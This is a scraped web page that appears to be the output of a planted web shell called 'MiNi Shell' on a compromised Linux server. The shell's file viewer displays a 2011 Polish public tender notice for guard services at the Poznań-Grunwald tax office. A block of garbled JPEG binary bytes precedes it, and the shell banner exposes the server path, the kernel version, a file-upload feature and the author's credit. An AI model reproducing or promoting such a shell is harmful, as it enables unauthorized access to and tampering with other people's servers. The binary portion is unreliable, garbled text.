JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111124/395400-N-2011.html

<p class="kh_header"><b>Poznań: Świadczenie usług fizycznej ochrony  osób i mienia, obiektu i posesji   Urzędu Skarbowego Poznań - Grunwald</b><br>
<b>Numer ogłoszenia: 395400 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy Poznań-Grunwald , ul. M. Smoluchowskiego 1, 60-179 Poznań, woj. wielkopolskie, tel. 061 6644000, faks 061 6644037.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Urząd Skarbowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług fizycznej ochrony  osób i mienia, obiektu i posesji   Urzędu Skarbowego Poznań - Grunwald.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  świadczenie usług fizycznej ochrony osób  i mienia, obiektu i posesji Urzędu Skarbowego Poznań - Grunwald,

2. Do zadań ochrony należy :

1) ochrona obiektu i mienia, w tym sprzętu i urządzeń znajdujących się na terenie obiektu, przed kradzieżą, włamaniem i zniszczeniem,

2) kontrola osób wchodzących na teren Urzędu i pojazdów wjeżdżających na teren obiektu, podejmowanie interwencji wobec osób zakłócających porządek, ujęcie osób na gorącym uczynku popełnienia przestępstwa lub podejrzanych o jego popełnienie, jeżeli zachodzi obawa ich ucieczki albo zatarcia śladów;

3) zabezpieczenie dostępu osób nieuprawnionych na teren obiektu.


3. W zakres ochrony wchodzą  czynności :

1) prowadzenie dokumentacji służbowej,

2) zapewnienie bezpieczeństwa pracownikom i klientom przebywającym na terenie chronionego obiektu i posesji, 

3) wydawanie kluczy do poszczególnych pomieszczeń  biurowych, magazynowych i gospodarczych przed rozpoczęciem pracy, w czasie godzin pracy oraz po godzinach pracy, prowadzenie ewidencji  wydania kluczy, odpowiednie przechowywanie i zabezpieczanie tych kluczy,

4) obsługa istniejących w obiekcie systemów: alarmowych napadu i włamania, telewizji przemysłowej, instalacji ochrony p-poż. i wykrywania pożaru,

5) patrolowanie ciągów komunikacyjnych obiektu,

6) uniemożliwienie wejścia na teren obiektu osobom, w przypadku uzasadnionego podejrzenie, że wnoszą one broń, materiały wybuchowe i inne niebezpieczne narzędzia lub substancje,

7)  utrzymanie stałej łączności radiowej z grupą interwencyjna podmiotu chroniącego obiekt; działanie grupy interwencyjnej w sytuacji zagrożenia, reakcja grupy nastąpi  w czasie nie dłuższym niż 15 minut,
8) niezwłoczne podejmowanie, w razie zagrożenia powstania szkody lub powstania szkody na ochranianym mieniu, szczególnie w przypadkach:
a)	awarii istniejących w chronionych obiektach instalacji,
b)	pożaru,
c)	uszkodzeń obiektów w wyniku działania czynników zewnętrznych,
d)	włamania
e)	klęsk żywiołowych,
stosownych do sytuacji czynności (w tym także z użyciem grupy interwencyjnej), mających na celu zapobieżenie powstania szkody lub ograniczenie jej rozmiarów,
9 ) powiadamianie policji w przypadkach zakłócenia porządku na terenie chronionego obiektu lub posesji Urzędu,
10) powiadamianie, w razie: napadu, włamania, pożaru, uszkodzeń obiektów w wyniku działania czynników zewnętrznych, awarii, właściwych służb i straży, Naczelnika Urzędu oraz  innych pracowników Urzędu wskazanych przez Zamawiającego,
11) dopilnowanie aby przed godzinami urzędowania Urzędu na teren Urzędu wchodziły tylko osoby upoważnione przez Zamawiającego,
12) dopilnowanie aby po godzinach urzędowania i po godzinach pracy pracowników Zamawiającego, na terenie Urzędu przebywały jedynie osoby upoważnione przez Zamawiającego,
13) zamykanie na klucz oraz otwieranie wszystkich drzwi wejściowych do obiektu Urzędu i furtki wejściowej na wewnętrzny parking Urzędu o godzinach i w dniach wskazanych przez Zamawiającego,
14) zamykanie i otwieranie szlabanu znajdującego się przy wjeździe na wewnętrzny parking Urzędu,
15) zapalanie i gaszenie świateł nocnych zewnętrznych i wewnętrznych w obiekcie i na posesji Urzędu o godzinach wskazanych przez Zamawiającego,

16) sprawowanie, w czasie realizacji usługi ochrony , ogólnego nadzoru nad pracą urządzeń wodno-kanalizacyjnych, rozdzielni elektrycznej, urządzeń pomiarowych i urządzeń centralnego ogrzewania,

17) wykonywanie innych poleceń z zakresu służby ochrony  zleconych przez Naczelnika Urzędu lub osoby przez niego upoważnione.	

4. Warunki realizacji zamówienia:
 1 ) Usługa (ochrona) będzie świadczona w następujący sposób:
a) w poniedziałki w godz. od 6.30 - 22.00 w następujący sposób :
-w godz. od 6.30 - 7.00 przez jednego  pracownika ochrony, 
-w godz. od 7.00 - 16.00 przez dwóch  pracowników ochrony,
-w godz. od 16.00 - 22.00 przez jednego  pracownika ochrony,
b) we wtorek, środę, czwartek i piątek w godz. 6.30 - 21.00 w następujący sposób: 
-w godz. od 6.30 - 7.00 przez jednego  pracownika ochrony, 
-w godz. od 7.00 - 16.00 przez dwóch  pracowników ochrony,
-w godz. od 16.00 - 21.00 przez jednego  pracownika ochrony,
Średniomiesięczna liczba godzin wynosi ok.490  rbh. 
2) Zamawiający zastrzega sobie prawo do zmiany dni i  godzin świadczenia usług ochrony określonych wyżej w przypadku zmiany wymiaru lub rozkładu czasu pracy Zamawiającego, a także w innych uzasadnionych przypadkach ( np. Akcja PIT, Dzień otwarty itp. ) bez zmiany wynagrodzenia.
3)  Wykonawca zobowiązuje się, że pracownicy wykonujący czynności ochrony na terenie Urzędu Skarbowego Poznań - Grunwald dysponowali będą licencjami ochrony I stopnia - zgodnie z przepisem art.25 ust.2 i 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia.
 
4) Wykonawca na własny koszt wyposaży pracowników ochrony, wyznaczonych do realizacji zadań na terenie Urzędu Skarbowego Poznań - Grunwald, w ubiory umożliwiające ich identyfikację i środki łączności bezprzewodowej gwarantujące im stały kontakt z grupą interwencyjną. 

5) Wykonawca, na własny koszt dokona podłączenia system dozoru Urzędu do swojego systemu monitoringu. 
6) Wykonawca zobowiąże się do deponowania kluczy do drzwi wejściowych do obiektu Urzędu Skarbowego Poznań - Grunwald w swojej siedzibie ( oddziale ).Klucze te zabezpieczone w plombowanym pojemniku przechowywane będą w sejfie ( szafie metalowej ) w siedzibie ( oddziale) Wykonawcy. Wykonawca ponosi  odpowiedzialność z tytułu przechowywania i dysponowania kluczami do obiektu Urzędu Skarbowego Poznań - Grunwald.
 W zakresie przechowywania i dysponowania kluczami obowiązywała będzie następująca procedura:
 a) w dniach pracy Urzędu , o godz. 6.30 grupa interwencyjna Wykonawcy przywozi klucze ( uprzednio zdeponowane ) do Urzędu  przekazując je pracownikowi ochrony obejmującemu służbę w obiekcie,
 b) pracownik ten, wspólnie z członkami grupy interwencyjnej, dokonuje zewnętrznej lustracji obiektu i obszaru administracyjnego Urzędu w celu ustalenia ewentualnych śladów zdarzeń nadzwyczajnych, następnie otwiera drzwi do obiektu i wyłącza system alarmowy,
 c) w dniach pracy Urzędu, o godz.21.00 ( w poniedziałki o godz. 22.00 ), pracownik ochrony kończący służbę zamyka obiekt i uruchamia istniejące w obiekcie systemy; grupa interwencyjna Wykonawcy przyjeżdża do obiektu, odbiera  od pracownika ochrony kończącego służbę klucze do drzwi  wejściowych, następnie deponuje je w saszetce zabezpieczając plombą, po czym przewozi klucze do swojej siedziby ( oddziału ), gdzie zostaną umieszczone w sejfie ( metalowej szafie )
 d) w dniach ustawowo wolnych od pracy ( lub innych zgłoszonych Wykonawcy z 24-godzinnym wyprzedzeniem przez Zamawiającego ) klucze pozostają zdeponowane w siedzibie ( oddziale ) Wykonawcy. 
7) Zamawiający, z uwagi na znajdujące się w budynku Urzędu dwa pokoje gościnne usytuowane w piwnicy budynku ( pok.011 i 013),  po godzinach w których wykonywana będzie fizyczna ochrona obiektu, będzie dowolnie dysponował kluczami umożliwiającymi dostęp do tych pomieszczeń. Dostęp do  pomieszczeń odbywa się przez wyjście usytuowane na tyłach budynku od ul. Smoluchowskiego 1/9. Obszar w którym znajdują się pokoje gościnne jest wydzielony i zabezpieczony w sposób uniemożliwiający przejście do innych pomieszczeń Urzędu. 
8) W sytuacjach wyższej konieczności ( np. awarie, sytuacje zagrażające bezpieczeństwu mienia ) Zamawiający dopuszcza możliwość otwarcia obiektu przez osoby posiadające specjalne upoważnienie Naczelnika Urzędu. W takiej sytuacji fakt otwarcia obiektu zgłaszany będzie Wykonawcy, w następnym dniu do godz. 8.00  
9) Pracownicy Wykonawcy  przewidziani do pełnienia obowiązków na terenie Urzędu Skarbowego Poznań - Grunwald zostaną przeszkoleni przez Zamawiającego w zakresie ochrony informacji niejawnych .

10) Harmonogram świadczenia usług  Zamawiający ustali z Wykonawcą w formie odrębnej, obustronnie zaaprobowanej Instrukcji pełnienia służby przez pracowników Ochrony na terenie Urzędu Skarbowego Poznań - Grunwald ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie przewiduje się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przedmiotowego warunku, jeżeli Wykonawca przedłoży aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty  złożone przez Wykonawcę w niniejszy postępowaniu metodą warunku granicznego - spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przedmiotowego warunku, jeżeli Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch usług ochrony osób i mienia tożsamych z przedmiotem zamówienia tj. ochrony osób i mienia w obiekcie użyteczności publicznej o powierzchni nie mniejszej niż 1500 m2, w którym jednorazowo przebywa minimum 100 osób. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty  złożone przez Wykonawcę w niniejszy postępowaniu metodą warunku granicznego - spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przedmiotowego warunku, jeżeli Wykonawca wykaże, ze do realizacji przedmiotu zamówienia skierowane zostaną osoby, które posiadają licencję  co najmniej I stopnia. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty  złożone przez Wykonawcę w niniejszy postępowaniu metodą warunku granicznego - spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przedmiotowego warunku, jeżeli Wykonawca wykaże, ze do realizacji przedmiotu zamówienia skierowane zostaną osoby, które posiadają licencję  co najmniej I stopnia. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty  złożone przez Wykonawcę w niniejszy postępowaniu metodą warunku granicznego - spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przedmiotowego warunku, jeżeli Wykonawca przedłoży opłaconą polisę lub inny dokument ubezpieczenia potwierdzający , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty  złożone przez Wykonawcę w niniejszy postępowaniu metodą warunku granicznego - spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy  Poznań - Grunwald
z siedzibą ul. M.Smoluchowskiego 1;  60-179 Poznań
pok. 12 (sala obsługi klientów).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2011 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, tj.: Urząd Skarbowy Poznań - Grunwald , 60-179 Poznań, ul M. Smoluchowskiego 1 w Kancelarii Urzędu  (sala obsługi klienta - pok. 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com